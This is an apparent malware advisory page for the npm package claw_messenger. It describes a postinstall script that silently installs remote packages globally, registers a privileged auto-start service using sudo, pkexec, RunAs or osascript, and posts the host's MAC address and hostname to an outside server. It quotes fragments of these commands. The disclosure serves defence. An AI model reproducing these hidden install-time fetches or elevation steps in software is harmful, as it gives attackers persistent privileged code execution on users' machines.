MAL-2026-4526
Malicious code in claw_messenger (npm)
상세
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b621afa50fe31026a12750b83eeb309366f95b07a9e0c5095d3e862f0007b70f) The postinstall lifecycle script in dist/postinstall.js spawns two detached, hidden child processes during `npm install`. (1) `spawn('npm', ['install', '-g', 'opencode-ai', '--registry=https://registry.npmmirror.com',...], { shell: true, detached: true, stdio: 'ignore', windowsHide: true })` silently performs a global `npm install` of `opencode-ai` from a non-default registry mirror. opencode-ai is not declared in package.json or documented in the README, so the package surreptitiously expands the installer's globally-installed package surface to undocumented third-party code that the author or any future hijacker of that name can mutate. (2) An update-silent-service flow loads dist/service-installer.js which runs `execSync('npm install -g claw-subagent-service@latest', { stdio: 'inherit', timeout: 120000 })` against a mutable `@latest` tag, then dist/daemon-manager.js elevates and registers the resulting binary as a privileged auto-start system service: on Windows via `Start-Process sc -ArgumentList 'start claw-subagent-service' -Verb RunAs`, on Linux via systemd with `pkexec`/`sudo`, on macOS via `osascript... with administrator privileges`. The combination — install-time, hidden, no-consent, unpinned remote dependency fetch followed by privileged auto-start service registration — gives the author (and anyone who later compromises `opencode-ai` or `claw-subagent-service`) persistent root/Administrator code execution on every machine that installs claw_messenger. Separately, dist/auto-register.js posts the host's MAC address and hostname to https://newsradar.dreamdt.cn/im/api/claw/register on plugin load, which is undocumented device-tracking telemetry but is secondary to the install-time RCE surface.
이 버전이 영향받나요?
사용 중인 패키지 버전을 입력하면 즉시 평가합니다.
영향 패키지
No fixed version published yet for claw_messenger (npm). Pin to a known-safe version or switch to an alternative.
참고
- https://www.npmjs.com/package/claw_messenger/v/0.0.76 [PACKAGE]
- https://www.npmjs.com/package/claw_messenger/v/0.0.81 [PACKAGE]
- https://www.npmjs.com/package/claw_messenger/v/0.0.79 [PACKAGE]
- https://www.npmjs.com/package/claw_messenger/v/0.0.95 [PACKAGE]
- https://www.npmjs.com/package/claw_messenger/v/0.0.80 [PACKAGE]
- https://www.npmjs.com/package/claw_messenger/v/0.0.91 [PACKAGE]
- https://www.npmjs.com/package/claw_messenger/v/0.0.84 [PACKAGE]
- https://www.npmjs.com/package/claw_messenger/v/0.0.94 [PACKAGE]
- https://www.npmjs.com/package/claw_messenger/v/0.0.78 [PACKAGE]
- https://www.npmjs.com/package/claw_messenger/v/0.0.77 [PACKAGE]
- https://www.npmjs.com/package/claw_messenger/v/0.0.83 [PACKAGE]
- https://www.npmjs.com/package/claw_messenger/v/0.0.89 [PACKAGE]
- https://www.npmjs.com/package/claw_messenger/v/2.1.1 [PACKAGE]
- https://www.npmjs.com/package/claw_messenger/v/2.1.5 [PACKAGE]
- https://www.npmjs.com/package/claw_messenger/v/2.1.3 [PACKAGE]
- https://www.npmjs.com/package/claw_messenger/v/2.1.4 [PACKAGE]